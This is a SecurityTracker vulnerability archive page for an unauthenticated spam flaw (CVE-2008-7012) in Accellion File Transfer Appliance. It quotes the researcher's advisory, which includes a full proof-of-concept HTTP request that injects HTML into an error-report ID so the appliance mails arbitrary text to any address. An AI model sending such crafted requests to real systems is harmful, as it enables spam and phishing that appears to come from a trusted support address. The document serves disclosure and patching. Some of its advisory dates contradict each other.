Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Accellion File Transfer Appliance Lets Remote Users Forward SPAM
|
|
SecurityTracker Alert ID: 1020870
|
|
SecurityTracker URL: http://securitytracker.com/id?1020870
|
|
CVE Reference: CVE-2008-7012
(Links to External Site)
|
Updated: Aug 20 2009
|
Original Entry Date: Sep 15 2008
|
Impact: Host/resource access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): FTA_7_0_178
|
Description: A vulnerability was reported in Accellion File Transfer Appliance. A remote user can send SPAM via the appliance.
A remote user can invoke the 'error reporting page' and create a support ticket with specially crafted text in the ID error reference
field to cause the system to send arbitrary e-mail to arbitrary users.
The vendor was notified on August 20, 2008.
The original
advisory is available at:
http://zebux.free.fr/pub/Advisory/Advisory_Accellion_SPAM_Engine_Vulnerability_200808.txt
Eric BEAULIEU
reported this vulnerability.
|
Impact: A remote user can send SPAM to arbitrary users.
|
Solution: The vendor has issued a fixed version (FTA_7_0_189).
|
Vendor URL: www.accellion.com/ (Links to External Site)
|
Cause: Access control error
|
Reported By: "Eric Beaulieu" <eric.beaulieu@gmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 15 Sep 2008 13:52:21 +0200
From: "Eric Beaulieu" <eric.beaulieu@gmail.com>
Subject: New vulnerability in Accellion File Transfer Appliance
|
Hello,
I recently found a security issue on Accellion File Transpfer Appliance.
This vulnerability could be used to send SPAM to internal and external
address.
After I report to Accellion this issue, they fixed this problem with
FTA_7_0_189 version. And Accellion inform their client that they have to
update their appliance.
For information about Accellion FTA (www.accellion.com) :
Accellion File Transfer Appliance (FTA) is a secure file transfer solution.
This appliance allow enterprises to securly send and receive large e-mail
attachements without any modification of the email iarchitecture.
My advisory is on my website :
http://zebux.free.fr/pub/Advisory/Advisory_Accellion_SPAM_Engine_Vulnerabil=
ity_200808.txt
Title: Accellion File Transfer - SPAM Engine Vulnerabilities
Criticality: High (3/3)
Affected software: Accellion File Transfer FTA_7_0_178
Author: Eric BEAULIEU, eric.beaulieu \[at\] zebux.org, http:\\
www.zebux.org
Discovery Date: 20-08-2008
Issue solved: 18-08-2008
Location URL:
http://www.zebux.org/pub/Advisory/Advisory_Accellion_SPAM_Engine_Vulnerabil=
ity_200808.txt
Summary
-------
Accellion File Transfer Appliance is prone to a vulnerability that can
be exploited, without any authentication, by malicious remote people to
conduct a SPAM attack.
Description
-----------
A vulnerability has been discovered in Accelion "error reporting page",
which could be exploited to send mass mailing to internal or external email
address. The error reporting page is used to informed Accellion
administrator
and Accellion support that there is a problem on the appliance (for
example to inform that an URL doesn't exist). Users have an interface to
describe the problem and set his email address to receive a message with an
Accellion support ticket ID.
But if a malicious user add, with the ID error reference (in the URL
address bar), a message, he will received the ticket ID and the message
text. So malicious people could use this URL address to send external and
internal
mass mailing (because Accellion appliance is always allowed to send
external and internal on SMTP infrastructure).
Example:
To exploit this vulnerability, you have to forge a malicious HTTP
request (for example with Firefox module: Live HTTP Headers):
URL:
https://[Accelion web
server]/courier/1000@/api_error_email.html?id=3D1002K725PI-888-100Test_SPAM
<H1>SPAM_ATTACK</H1>
HTTP HEADER:
Host: [Accelion web server]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:
1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept:
text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: fr,fr-fr;q=3D0.8,en-us;q=3D0.5,en;q=3D0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=3D0.7,*;q=3D0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://[Accelion web
server]/courier/1000@/api_error_email.html?id=3D1002K725PI-888-100Test_SPAM
<H1>SPAM_ATTACK</H1>
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
POST DATA:
description=3DCould+you+please+close+this+tickets%0D%0A%0D%0ARegards&client=
_email=3Demail_to_spam%
40victim_domain.com&submit=3DSoumettre+le+rapport
Malicious message will be :
From : support@accellion.com [mailto:support@accellion.com]
=C0 : email_to_spam@victim_domain.com
Objet : API Error Report: 1002K725PI-888-100Test_SPAM
<H1>SPAM_ATTACK</H1>
Hi email_to_spam,
Error ID 1002K725PI-888-100Test_SPAM
SPAM_ATTACK
Timestamp 2008-08-19 08:20:53 GMT
This email has been sent to you for your own reference.
We will attend to this error report as soon as possible.
Thank you for using Secure File Transfer.
________________________________________
Accellion Pte Ltd
http://www.accellion.com
Solution
--------
Upgrade to version FTA_7_0_189
Workaround
----------
There is not workaround.
References
----------
FrSIRT Advisory:
Bugtraq ID:
Websense Advisory URL:
Secunia Advisory ID:
CVE ID:
Security Tracker:
Timeline
--------
20-08-2008 - Vulnerability was been discovered
21-08-2008 - Vulnerability reported to vendor
22-08-2008 - Vendor informed the stat of fix process
28-08-2006 - Vendor published the new version and contact Accellion
customers
Revision history
----------------
18-08-2008 - 1.0 - Advisory written
If you have any question, please feel free to contact me, thank in advance
Eric BEAULIEU
|
|
Go to the Top of This SecurityTracker Archive Page
|
